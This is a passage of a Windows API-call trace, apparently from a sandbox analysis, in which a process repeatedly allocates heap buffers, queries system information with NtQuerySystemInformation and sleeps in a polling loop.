hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.844] Sleep (dwMilliseconds=0x110) [0198.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.861] Sleep (dwMilliseconds=0x110) [0198.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.877] Sleep (dwMilliseconds=0x110) [0198.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.892] Sleep (dwMilliseconds=0x110) [0198.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.911] Sleep (dwMilliseconds=0x110) [0198.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.927] Sleep (dwMilliseconds=0x110) [0198.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.941] Sleep (dwMilliseconds=0x110) [0198.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.954] Sleep (dwMilliseconds=0x110) [0198.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.976] Sleep (dwMilliseconds=0x110) [0198.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.981] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.984] Sleep (dwMilliseconds=0x110) [0198.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.006] Sleep (dwMilliseconds=0x110) [0199.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.017] Sleep (dwMilliseconds=0x110) [0199.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.042] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.042] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.042] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.042] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.047] Sleep (dwMilliseconds=0x110) [0199.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.101] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.101] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.102] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.102] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.103] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.103] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.103] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.103] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.104] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.104] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.105] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.105] Sleep (dwMilliseconds=0x110) [0199.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) 